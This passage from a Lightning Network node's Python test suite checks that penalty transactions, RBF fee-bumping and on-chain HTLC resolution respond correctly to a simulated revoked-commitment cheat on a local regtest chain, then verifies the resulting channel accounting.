def test_penalty_htlc_tx_timeout(node_factory, bitcoind, chainparams):
    """ Test that the penalizing node claims any published
    HTLC transactions

    Node topology:
    l1 <-> l2 <-> l3 <-> l4
                    ^---> l5

    l1 pushes money to l5, who doesn't fulfill (freezing htlc across l2-l3)
    l4 pushes money to l1, who doesn't fulfill (freezing htlc across l2-l3)
    we snapshot l2
    l2 pushes money to l3 (updating state)
    l2 + l3 go offline; l2 is backed up from snapshot
    l1 fails the channel with l2, fulfilling the stranded htlc onchain
    l2 comes back online, force closes channel with l3
    block chain advances, l2 broadcasts the timeout htlc_tx + fulfill htlc_tx
    both of which have a delay. l2 goes ahead and 'steals back' their
    output + the htlc they fulfill

    l3 comes back online, sees l2's cheat. takes funds from htlc timeout tx
    some blocks are mined. the dust settles.

    we check the accounting.
    """
    # We track channel balances, to verify that accounting is ok.
    coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
    # l1 and l5 both hold fulfills (dev_disconnect); l2/l3 get cheated on
    # and may log broken messages.
    l1, l2, l3, l4, l5 = node_factory.get_nodes(
        5,
        opts=[
            {
                'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
                'may_reconnect': True,
                'dev-no-reconnect': None,
            }, {
                'plugin': coin_mvt_plugin,
                'dev-no-reconnect': None,
                'may_reconnect': True,
                'allow_broken_log': True,
            }, {
                'plugin': coin_mvt_plugin,
                'dev-no-reconnect': None,
                'may_reconnect': True,
                'allow_broken_log': True,
            }, {
                'dev-no-reconnect': None,
            }, {
                'disconnect': ['-WIRE_UPDATE_FULFILL_HTLC'],
                'may_reconnect': True,
                'dev-no-reconnect': None,
                'allow_broken_log': True,
            }
        ]
    )
    node_factory.join_nodes([l1, l2, l3, l4], wait_for_announce=True)
    node_factory.join_nodes([l3, l5], wait_for_announce=True)
    channel_id = first_channel_id(l2, l3)
    # push some money so that 1 + 4 can both send htlcs
    inv = l2.rpc.invoice(10**9 // 2, '1', 'balancer')
    l1.rpc.pay(inv['bolt11'])
    inv = l4.rpc.invoice(10**9 // 2, '1', 'balancer')
    l2.rpc.pay(inv['bolt11'])
    # now we send two 'sticky' htlcs, l1->l5 + l4->l1
    amt = 10**8 // 2
    sticky_inv_1 = l5.rpc.invoice(amt, '2', 'sticky')
    route = l1.rpc.getroute(l5.info['id'], amt, 1)['route']
    l1.rpc.sendpay(route, sticky_inv_1['payment_hash'], payment_secret=sticky_inv_1['payment_secret'])
    l5.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
    sticky_inv_2 = l1.rpc.invoice(amt, '2', 'sticky')
    route = l4.rpc.getroute(l1.info['id'], amt, 1)['route']
    l4.rpc.sendpay(route, sticky_inv_2['payment_hash'], payment_secret=sticky_inv_2['payment_secret'])
    l1.daemon.wait_for_log('dev_disconnect: -WIRE_UPDATE_FULFILL_HTLC')
    # both stuck htlcs traverse the l2-l3 channel
    wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers'][0]['channels'][0]['htlcs']) == 2)
    # make database snapshot of l2
    l2.stop()
    l2_db_path = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3')
    l2_db_path_bak = os.path.join(l2.daemon.lightning_dir, chainparams['name'], 'lightningd.sqlite3.bak')
    copyfile(l2_db_path, l2_db_path_bak)
    l2.start()
    sync_blockheight(bitcoind, [l2])
    # push some money from l3->l2, so that the commit counter advances
    l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
    inv = l3.rpc.invoice(10**4, '1', 'push')
    # Make sure gossipd in l2 knows it's active
    wait_for(lambda: [c['active'] for c in l2.rpc.listchannels(l2.get_channel_scid(l3))['channels']] == [True, True])
    l2.rpc.pay(inv['bolt11'])
    # stop both nodes, roll back l2's database
    l2.stop()
    l3.stop()
    copyfile(l2_db_path_bak, l2_db_path)
    # start l2, now back a bit. force close channel with l3 while l3 is still offline
    # (l2 broadcasts a revoked commitment, i.e. it is cheating)
    l2.start()
    sync_blockheight(bitcoind, [l2])
    l2.rpc.close(l3.info['id'], 1)
    l2.daemon.wait_for_log('sendrawtx exit 0')
    # reconnect with l1, which will fulfill the payment
    l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
    l2.daemon.wait_for_log('got commitsig .*: feerate 11000, blockheight: 0, 0 added, 1 fulfilled, 0 failed, 0 changed')
    # l2 moves on for closed l3
    bitcoind.generate_block(1, wait_for_mempool=1)
    l2.daemon.wait_for_log('to ONCHAIN')
    l2.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 16 blocks',
                             'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
                             'Propose handling OUR_UNILATERAL/THEIR_HTLC by OUR_HTLC_SUCCESS_TX .* after 0 blocks'])
    l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
                                   'OUR_UNILATERAL/THEIR_HTLC')
    bitcoind.generate_block(1, wait_for_mempool=1)
    l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
    # after 5 blocks, l2 reclaims both their DELAYED_OUTPUT_TO_US and their delayed output
    bitcoind.generate_block(5, wait_for_mempool=0)
    sync_blockheight(bitcoind, [l2])
    l2.daemon.wait_for_logs(['Broadcasting OUR_DELAYED_RETURN_TO_WALLET .* to resolve OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US',
                             'Broadcasting OUR_DELAYED_RETURN_TO_WALLET .* to resolve OUR_UNILATERAL/DELAYED_OUTPUT_TO_US'])
    # after the 16-block cltv, l2 also times out the other stuck htlc
    bitcoind.generate_block(10, wait_for_mempool=2)
    l2.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
                                   'OUR_UNILATERAL/OUR_HTLC')
    bitcoind.generate_block(1, wait_for_mempool=1)
    l2.daemon.wait_for_log('Propose handling OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
    # l3 comes back up, sees cheat, penalizes l2 (revokes the htlc they've offered;
    # notes that they've successfully claimed to_local and the fulfilled htlc)
    l3.start()
    sync_blockheight(bitcoind, [l3])
    l3.daemon.wait_for_logs(['Propose handling THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_PENALTY_TX',
                             'Propose handling THEIR_REVOKED_UNILATERAL/THEIR_HTLC by OUR_PENALTY_TX',
                             'Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
                             'by OUR_PENALTY_TX',
                             'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_HTLC_FULFILL_TO_THEM',
                             'Propose handling OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM'
                             ' by OUR_PENALTY_TX',
                             'Resolved OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
                             'by THEIR_DELAYED_CHEAT',
                             'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
                             'by THEIR_DELAYED_CHEAT',
                             'Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM',
                             'Propose handling THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
    # Make sure we've broadcast the tx we expect (other channels shutting down can create
    # unrelated txs!)
    # In theory this could have occurred before all the previous loglines appeared.
    l3.daemon.logsearch_start = 0
    line = l3.daemon.wait_for_log(r'Broadcasting OUR_PENALTY_TX \([0-9a-f]*\) to resolve THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM')
    tx = re.search(r'\(([0-9a-f]*)\)', line).group(1)
    txid = bitcoind.rpc.decoderawtransaction(tx)['txid']
    bitcoind.generate_block(1, wait_for_mempool=[txid])
    l3.daemon.wait_for_log('Resolved THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
                           'by our proposal OUR_PENALTY_TX')
    l2.daemon.wait_for_log('Unknown spend of OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
    # 100 blocks later, l3+l2 are both done
    bitcoind.generate_block(100)
    l3.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l2.info['id']))
    l2.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l3.info['id']))
    assert account_balance(l3, channel_id) == 0
    assert account_balance(l2, channel_id) == 0
    # Expected utxo graph for l2 (cheater): it kept the outputs it swept
    # before l3 returned, but the timed-out htlc gets penalized.
    expected_2 = {
        'A': [('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
        'B': [('external', ['to_them'], None, None), ('cid1', ['htlc_fulfill'], ['htlc_fulfill'], 'E'), ('cid1', ['delayed_to_us'], ['to_wallet'], 'F'), ('cid1', ['htlc_timeout'], ['htlc_timeout'], 'C')],
        'C': [('external', ['penalized'], None, None)],
        'E': [('cid1', ['htlc_tx'], ['to_wallet'], 'G')],
        'F': [('wallet', ['deposit'], None, None)],
        'G': [('wallet', ['deposit'], None, None)]
    }
    # Expected utxo graph for l3 (penalizer): claims the timeout-tx output,
    # records what l2 managed to steal.
    expected_3 = {
        'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
        'B': [('wallet', ['deposit'], None, None), ('external', ['htlc_fulfill'], ['htlc_fulfill'], 'E'), ('external', ['stolen'], None, None), ('external', ['htlc_timeout'], ['htlc_timeout'], 'C')],
        'C': [('cid1', ['penalty'], ['to_wallet'], 'D')],
        'D': [('wallet', ['deposit'], None, None)],
        'E': [('external', ['stolen'], None, None)]
    }
    if anchor_expected():
        expected_2['B'].append(('external', ['anchor'], None, None))
        expected_3['B'].append(('external', ['anchor'], None, None))
        expected_2['B'].append(('wallet', ['anchor'], None, None))
        expected_3['B'].append(('wallet', ['anchor'], None, None))
    tags = check_utxos_channel(l2, [channel_id], expected_2, filter_channel=channel_id)
    check_utxos_channel(l3, [channel_id], expected_3, tags, filter_channel=channel_id)
@pytest.mark.developer("uses dev_sign_last_tx")
def test_penalty_rbf_normal(node_factory, bitcoind, executor, chainparams):
    '''
    Test that penalty transactions are RBFed.

    l1 cheats by broadcasting a revoked commitment while miners censor
    l2's transactions; l2 must keep fee-bumping (RBF) its penalty txes
    each block, and every RBF tx in the sequence must itself be a valid
    replacement acceptable to bitcoind.
    '''
    # We track channel balances, to verify that accounting is ok.
    coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
    to_self_delay = 10
    # l1 is the thief, which causes our honest upstanding lightningd
    # code to break, so l1 can fail.
    # Initially, disconnect before the HTLC can be resolved.
    l1 = node_factory.get_node(options={'dev-disable-commit-after': 1},
                               may_fail=True, allow_broken_log=True)
    l2 = node_factory.get_node(options={'dev-disable-commit-after': 1,
                                        'watchtime-blocks': to_self_delay,
                                        'plugin': coin_mvt_plugin})
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fundchannel(l2, 10**7)
    channel_id = first_channel_id(l1, l2)
    # Trigger an HTLC being added.
    t = executor.submit(l1.pay, l2, 1000000 * 1000)
    # Make sure the channel is still alive.
    assert len(l1.getactivechannels()) == 2
    assert len(l2.getactivechannels()) == 2
    # Wait for the disconnection.
    l1.daemon.wait_for_log('dev-disable-commit-after: disabling')
    l2.daemon.wait_for_log('dev-disable-commit-after: disabling')
    # Make sure l1 gets the new HTLC.
    l1.daemon.wait_for_log('got commitsig')
    # l1 prepares a theft commitment transaction: the current commitment,
    # which becomes revoked once commits are re-enabled below.
    theft_tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
    # Now continue processing until fulfilment.
    l1.rpc.dev_reenable_commit(l2.info['id'])
    l2.rpc.dev_reenable_commit(l1.info['id'])
    # Wait for the fulfilment.
    l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
    l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
    l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
    l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
    # Now payment should complete.
    t.result(timeout=10)
    # l1 goes offline and bribes the miners to censor transactions from l2.
    l1.rpc.stop()

    def censoring_sendrawtx(r):
        # Pretend the broadcast succeeded, but never relay it to bitcoind.
        return {'id': r['id'], 'result': {}}

    l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', censoring_sendrawtx)
    # l1 now performs the theft attack!
    bitcoind.rpc.sendrawtransaction(theft_tx)
    bitcoind.generate_block(1)
    # l2 notices.
    l2.daemon.wait_for_log(' to ONCHAIN')

    def get_rbf_tx(self, depth, name, resolve):
        # Wait for the next "Broadcasting RBF" log line on node *self*
        # and return the raw tx hex captured from the trailing "(...)".
        r = self.daemon.wait_for_log('Broadcasting RBF {} .* to resolve {} depth={}'
                                     .format(name, resolve, depth))
        return re.search(r'.* \(([0-9a-fA-F]*)\)', r).group(1)

    rbf_txes = []
    # Now the censoring miners generate some blocks.
    for depth in range(2, 8):
        bitcoind.generate_block(1)
        sync_blockheight(bitcoind, [l2])
        # l2 should RBF, twice even, one for the l1 main output,
        # one for the l1 HTLC output.
        rbf_txes.append(get_rbf_tx(l2, depth,
                                   'OUR_PENALTY_TX',
                                   'THEIR_REVOKED_UNILATERAL/THEIR_HTLC'))
        rbf_txes.append(get_rbf_tx(l2, depth,
                                   'OUR_PENALTY_TX',
                                   'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM'))
    # Now that the transactions have high fees, independent miners
    # realize they can earn potentially more money by grabbing the
    # high-fee censored transactions, and fresh, non-censoring
    # hashpower arises, evicting the censor.
    l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', None)
    # Check that the order in which l2 generated RBF transactions
    # would be acceptable to Bitcoin.
    for tx in rbf_txes:
        # Use the bcli interface as well, so that we also check the
        # bcli interface.
        l2.rpc.call('sendrawtransaction', [tx, True])
    # Now the non-censoring miners overpower the censoring miners.
    bitcoind.generate_block(1)
    sync_blockheight(bitcoind, [l2])
    # And l2 should consider it resolved now.
    l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX')
    l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX')
    # And l2 should consider it in its listfunds.
    assert(len(l2.rpc.listfunds()['outputs']) >= 1)
    assert account_balance(l2, channel_id) == 0
    # Graph of coin_move events we expect: the penalty txes sweep both
    # outputs back into l2's wallet.
    expected_2 = {
        'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
        'B': [('cid1', ['penalty'], ['to_wallet'], 'C'), ('cid1', ['penalty'], ['to_wallet'], 'D')],
        'C': [('wallet', ['deposit'], None, None)],
        'D': [('wallet', ['deposit'], None, None)]
    }
    if anchor_expected():
        expected_2['B'].append(('external', ['anchor'], None, None))
        expected_2['B'].append(('wallet', ['anchor'], None, None))
    check_utxos_channel(l2, [channel_id], expected_2)
@pytest.mark.developer("uses dev_sign_last_tx")
def test_penalty_rbf_burn(node_factory, bitcoind, executor, chainparams):
    '''
    Test that penalty transactions are RBFed and we are willing to burn
    it all up to spite the thief.

    Like test_penalty_rbf_normal, but the censorship lasts long enough
    (depth up to 9) that the final RBF donates the entire amount to the
    miners as fees.
    '''
    # We track channel balances, to verify that accounting is ok.
    coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
    to_self_delay = 10
    # l1 is the thief, which causes our honest upstanding lightningd
    # code to break, so l1 can fail.
    # Initially, disconnect before the HTLC can be resolved.
    l1 = node_factory.get_node(options={'dev-disable-commit-after': 1},
                               may_fail=True, allow_broken_log=True)
    l2 = node_factory.get_node(options={'dev-disable-commit-after': 1,
                                        'watchtime-blocks': to_self_delay,
                                        'plugin': coin_mvt_plugin})
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fundchannel(l2, 10**7)
    channel_id = first_channel_id(l1, l2)
    # Trigger an HTLC being added.
    t = executor.submit(l1.pay, l2, 1000000 * 1000)
    # Make sure the channel is still alive.
    assert len(l1.getactivechannels()) == 2
    assert len(l2.getactivechannels()) == 2
    # Wait for the disconnection.
    l1.daemon.wait_for_log('dev-disable-commit-after: disabling')
    l2.daemon.wait_for_log('dev-disable-commit-after: disabling')
    # Make sure l1 gets the new HTLC.
    l1.daemon.wait_for_log('got commitsig')
    # l1 prepares a theft commitment transaction: the current commitment,
    # which becomes revoked once commits are re-enabled below.
    theft_tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
    # Now continue processing until fulfilment.
    l1.rpc.dev_reenable_commit(l2.info['id'])
    l2.rpc.dev_reenable_commit(l1.info['id'])
    # Wait for the fulfilment.
    l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
    l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
    l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
    l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
    # Now payment should complete.
    t.result(timeout=10)
    # l1 goes offline and bribes the miners to censor transactions from l2.
    l1.rpc.stop()

    def censoring_sendrawtx(r):
        # Pretend the broadcast succeeded, but never relay it to bitcoind.
        return {'id': r['id'], 'result': {}}

    l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', censoring_sendrawtx)
    # l1 now performs the theft attack!
    bitcoind.rpc.sendrawtransaction(theft_tx)
    bitcoind.generate_block(1)
    # l2 notices.
    l2.daemon.wait_for_log(' to ONCHAIN')

    def get_rbf_tx(self, depth, name, resolve):
        # Wait for the next "Broadcasting RBF" log line on node *self*
        # and return the raw tx hex captured from the trailing "(...)".
        r = self.daemon.wait_for_log('Broadcasting RBF {} .* to resolve {} depth={}'
                                     .format(name, resolve, depth))
        return re.search(r'.* \(([0-9a-fA-F]*)\)', r).group(1)

    rbf_txes = []
    # Now the censoring miners generate some blocks.
    for depth in range(2, 10):
        bitcoind.generate_block(1)
        sync_blockheight(bitcoind, [l2])
        # l2 should RBF, twice even, one for the l1 main output,
        # one for the l1 HTLC output.
        rbf_txes.append(get_rbf_tx(l2, depth,
                                   'OUR_PENALTY_TX',
                                   'THEIR_REVOKED_UNILATERAL/THEIR_HTLC'))
        rbf_txes.append(get_rbf_tx(l2, depth,
                                   'OUR_PENALTY_TX',
                                   'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM'))
    # Now that the transactions have high fees, independent miners
    # realize they can earn potentially more money by grabbing the
    # high-fee censored transactions, and fresh, non-censoring
    # hashpower arises, evicting the censor.
    l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', None)
    # Check that the last two txes can be broadcast.
    # These should donate the total amount to miners.
    rbf_txes = rbf_txes[-2:]
    for tx in rbf_txes:
        l2.rpc.call('sendrawtransaction', [tx, True])
    # Now the non-censoring miners overpower the censoring miners.
    bitcoind.generate_block(1)
    sync_blockheight(bitcoind, [l2])
    # And l2 should consider it resolved now.
    l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX')
    l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX')
    # l2 donated it to the miners, so it owns nothing
    assert(len(l2.rpc.listfunds()['outputs']) == 0)
    assert account_balance(l2, channel_id) == 0
    # Graph of coin_move events we expect: everything went to fees,
    # hence 'to_miner' instead of 'to_wallet' and no deposit nodes.
    expected_2 = {
        'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
        'B': [('cid1', ['penalty'], ['to_miner'], 'C'), ('cid1', ['penalty'], ['to_miner'], 'D')],
    }
    if anchor_expected():
        expected_2['B'].append(('external', ['anchor'], None, None))
        expected_2['B'].append(('wallet', ['anchor'], None, None))
    check_utxos_channel(l2, [channel_id], expected_2)
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_first_commit(node_factory, bitcoind):
    """Onchain handling where opener immediately drops to chain"""
    # We track channel balances, to verify that accounting is ok.
    coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
    # HTLC 1->2, 1 fails just after funding.
    disconnects = ['+WIRE_FUNDING_LOCKED', 'permfail']
    # Make locktime different, as we once had them reversed!
    l1, l2 = node_factory.line_graph(2, opts=[{'disconnect': disconnects,
                                               'plugin': coin_mvt_plugin},
                                              {'watchtime-blocks': 10,
                                               'plugin': coin_mvt_plugin}],
                                     fundchannel=False)
    l1.fundwallet(10**7)
    l1.rpc.fundchannel(l2.info['id'], 10**6)
    l1.daemon.wait_for_log('sendrawtx exit 0')
    bitcoind.generate_block(1)
    # l1 will drop to chain.
    l1.daemon.wait_for_log('permfail')
    l1.daemon.wait_for_log('sendrawtx exit 0')
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')
    # 10 later (l2's watchtime-blocks), l1 should collect its to-self payment.
    bitcoind.generate_block(10)
    l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
    # 94 later, l2 is done.
    bitcoind.generate_block(94)
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')
    # Now, 100 blocks (94 + 6) after the sweep, l1 should be done too.
    bitcoind.generate_block(6)
    l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_unwatch(node_factory, bitcoind):
    """Onchaind should not watch random spends"""
    # We track channel balances, to verify that accounting is ok.
    coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
    l1, l2 = node_factory.line_graph(2, opts={'plugin': coin_mvt_plugin})
    channel_id = first_channel_id(l1, l2)
    l1.pay(l2, 200000000)
    l1.rpc.dev_fail(l2.info['id'])
    l1.daemon.wait_for_log('Failing due to dev-fail command')
    l1.wait_for_channel_onchain(l2.info['id'])
    l1.bitcoin.generate_block(1)
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')
    # 10 later, l1 should collect its to-self payment.
    bitcoind.generate_block(10)
    l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
    # First time it sees it, onchaind cares.
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal '
                           'OUR_DELAYED_RETURN_TO_WALLET')
    # Now test unrelated onchain churn.
    # Daemon gets told about wallet; says it doesn't care.
    l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log("but we don't care")
    # And lightningd should respect that!
    assert not l1.daemon.is_in_log("Can't unwatch txid")
    # So these should not generate further messages
    for i in range(5):
        l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
        bitcoind.generate_block(1)
        # Make sure it digests the block
        sync_blockheight(bitcoind, [l1])
        # We won't see this again (only searching logs written since the
        # previous wait_for_log, via logsearch_start).
        assert not l1.daemon.is_in_log("but we don't care",
                                       start=l1.daemon.logsearch_start)
    assert account_balance(l1, channel_id) == 0
    assert account_balance(l2, channel_id) == 0
    # Note: for this test we leave onchaind running, so we can detect
    # any leaks!
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchaind_replay(node_factory, bitcoind):
    """Onchaind must be restartable from the DB after a node restart."""
    disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
    # Feerates identical so we don't get gratuitous commit to update them
    l1, l2 = node_factory.line_graph(2, opts=[{'watchtime-blocks': 201, 'cltv-delta': 101,
                                               'disconnect': disconnects,
                                               'feerates': (7500, 7500, 7500, 7500)},
                                              {'watchtime-blocks': 201, 'cltv-delta': 101}])
    inv = l2.rpc.invoice(10**8, 'onchaind_replay', 'desc')
    rhash = inv['payment_hash']
    routestep = {
        'msatoshi': 10**8 - 1,
        'id': l2.info['id'],
        'delay': 101,
        'channel': '1x1x1'
    }
    l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
    l1.daemon.wait_for_log('sendrawtx exit 0')
    bitcoind.generate_block(1, wait_for_mempool=1)
    # Wait for nodes to notice the failure, this search needle is after the
    # DB commit so we're sure the tx entries in onchaindtxs have been added
    l1.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
    l2.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
    # We should at least have the init tx now
    assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
    assert len(l2.db_query("SELECT * FROM channeltxs;")) > 0
    # Generate some blocks so we restart the onchaind from DB (we rescan
    # last_height - 100)
    bitcoind.generate_block(100)
    sync_blockheight(bitcoind, [l1, l2])
    # l1 should still have a running onchaind
    assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
    l2.rpc.stop()
    l1.restart()
    # Can't wait for it, it's after the "Server started" wait in restart()
    assert l1.daemon.is_in_log(r'Restarting onchaind for channel')
    # l1 should still notice that the funding was spent and that we should react to it
    l1.daemon.wait_for_log("Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET")
    sync_blockheight(bitcoind, [l1])
    bitcoind.generate_block(10)
    sync_blockheight(bitcoind, [l1])
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_dust_out(node_factory, bitcoind, executor):
    """Onchain handling of outgoing dust htlcs (they should fail)"""
    # We track channel balances, to verify that accounting is ok.
    coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
    # HTLC 1->2, 1 fails after it's irrevocably committed
    disconnects = ['-WIRE_REVOKE_AND_ACK', 'permfail']
    # Feerates identical so we don't get gratuitous commit to update them
    l1, l2 = node_factory.line_graph(2,
                                     opts=[{'disconnect': disconnects,
                                            'feerates': (7500, 7500, 7500, 7500),
                                            'plugin': coin_mvt_plugin},
                                           {'plugin': coin_mvt_plugin}])
    channel_id = first_channel_id(l1, l2)
    # Must be dust!  A 1msat HTLC is below the dust limit, so it never
    # appears as an output on the commitment tx.
    inv = l2.rpc.invoice(1, 'onchain_dust_out', 'desc')
    rhash = inv['payment_hash']
    routestep = {
        'msatoshi': 1,
        'id': l2.info['id'],
        'delay': 5,
        'channel': '1x1x1'
    }
    l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
    payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
    # l1 will drop to chain.
    l1.daemon.wait_for_log('permfail')
    l1.wait_for_channel_onchain(l2.info['id'])
    l1.bitcoin.generate_block(1)
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')
    # We use 3 blocks for "reasonable depth"
    bitcoind.generate_block(3)
    # It should fail.
    with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: missing in commitment tx'):
        payfuture.result(5)
    # Retry payment, this should fail (and, as a side-effect, tickle a
    # bug).
    with pytest.raises(RpcError, match=r'WIRE_UNKNOWN_NEXT_PEER'):
        l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
    # 6 later, l1 should collect its to-self payment.
    bitcoind.generate_block(6)
    l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
    # 94 later, l2 is done.
    bitcoind.generate_block(94)
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')
    # Restart l1, it should not crash!
    l1.restart()
    # Now, 100 blocks and l1 should be done.
    bitcoind.generate_block(6)
    l1.daemon.wait_for_log('onchaind complete, forgetting peer')
    # Payment failed, BTW
    assert only_one(l2.rpc.listinvoices('onchain_dust_out')['invoices'])['status'] == 'unpaid'
    assert account_balance(l1, channel_id) == 0
    assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_timeout(node_factory, bitcoind, executor):
    """Onchain handling of outgoing failed htlcs"""
    # We track channel balances, to verify that accounting is ok.
    coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
    # HTLC 1->2, 1 fails just after it's irrevocably committed
    disconnects = ['+WIRE_REVOKE_AND_ACK*3', 'permfail']
    # Feerates identical so we don't get gratuitous commit to update them
    l1, l2 = node_factory.line_graph(2,
                                     opts=[{'disconnect': disconnects,
                                            'feerates': (7500, 7500, 7500, 7500),
                                            'plugin': coin_mvt_plugin},
                                           {'plugin': coin_mvt_plugin}])
    channel_id = first_channel_id(l1, l2)
    inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
    rhash = inv['payment_hash']
    # We underpay, so it fails.
    routestep = {
        'msatoshi': 10**8 - 1,
        'id': l2.info['id'],
        'delay': 5,
        'channel': '1x1x1'
    }
    l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'], groupid=1)
    with pytest.raises(RpcError):
        l1.rpc.waitsendpay(rhash)
    # Make sure CLTVs are different, in case it confuses onchaind.
    bitcoind.generate_block(1)
    sync_blockheight(bitcoind, [l1])
    # Second one will cause drop to chain.
